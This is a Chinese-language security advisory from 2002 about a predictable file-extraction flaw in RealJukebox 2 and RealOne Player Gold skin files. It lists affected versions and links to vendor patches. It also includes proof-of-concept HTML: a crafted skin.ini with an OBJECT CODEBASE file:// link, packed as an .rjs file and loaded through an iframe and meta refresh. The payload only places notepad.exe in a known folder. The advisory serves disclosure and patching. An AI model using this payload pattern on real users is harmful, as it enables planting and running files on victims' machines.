|
|
Real Networks RealJukebox存在可预测文件展开漏洞
发布时间:2002-07-15
更新时间:2002-07-15
严重程度:中
威胁程度:其它
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:5210
受影响系统Real Networks RealJukebox 2 for Windows 1.0.2 .379
Real Networks RealJukebox 2 for Windows 1.0.2 .340
Real Networks RealJukebox 2 Plus for Windows 1.0.2 .379
Real Networks RealJukebox 2 Plus for Windows 1.0.2 .340
Real Networks RealOne Player Gold for Windows 6.0.10 .505
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 95
- Microsoft Windows 95 SR2
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows XP Home
- Microsoft Windows XP Professional 详细描述
Real Software发布了in RealJukebox2和Real Player Gold存在漏洞,当SKIN文件被打开的时候,SKIN包含的文件会展开到客户端已知位置上,这可以提供攻击这通过传送SKIN文件而放置可预测的文件位置上,利用其他的一些漏洞,通过"file://"连接来执行文件。
测试代码
制作skin.ini文件包含如下HTML标签:
[skin.ini]
<html>
<OBJECT CLASSID='CLSID:15589FA1-C456-11CE-BF01-00AA0055595A'
CODEBASE='file://c:\winnt\notepad.exe'></OBJECT>
</html>
压缩后把ZIP名改成"rjs",然后制作HTML文件包含上面的exploit.rjs文件,使目标用户浏览:
<html>
<META HTTP-EQUIV="Refresh" CONTENT="20;URL=file://c:\Program
Files\Real\RealJukebox\temp\~rjbtemp0\skin.ini">
<iframe src="exploit.rjs">
</html>
IE浏览test.html后,会把notpad.exe放到c:\Program
Files\Real\RealJukebox\temp\~rjbtemp0目录下。
解决方案
补丁下载:
Real Networks RealJukebox 2 for Windows 1.0.2 .379:
Real Networks Patch skinpfree2.rmp
http://www.service.real.com/help/faq/security/07092002/skinpfree2.rmp
Real Networks RealJukebox 2 Plus for Windows 1.0.2 .379:
Real Networks Patch skinpplus2.rmp
http://www.service.real.com/help/faq/security/07092002/skinpplus2.rmp
Real Networks RealJukebox 2 Plus for Windows 1.0.2 .340:
Real Networks Patch skinpplus1.rmp
http://www.service.real.com/help/faq/security/07092002/skinpplus1.rmp
Real Networks RealJukebox 2 for Windows 1.0.2 .340:
Real Networks Patch skinpfree1.rmp
http://www.service.real.com/help/faq/security/07092002/skinpfree1.rmp
Real Networks RealOne Player Gold for Windows 6.0.10 .505:
Real Networks Patch skinpatchr11s.rmp
http://www.service.real.com/help/faq/security/07092002/skinpatchr11s.rmp
相关信息
参考:http://online.securityfocus.com/archive/1/281916
相关主页:http://www.service.real.com/help/faq/security/bufferoverrun07092002.html
|
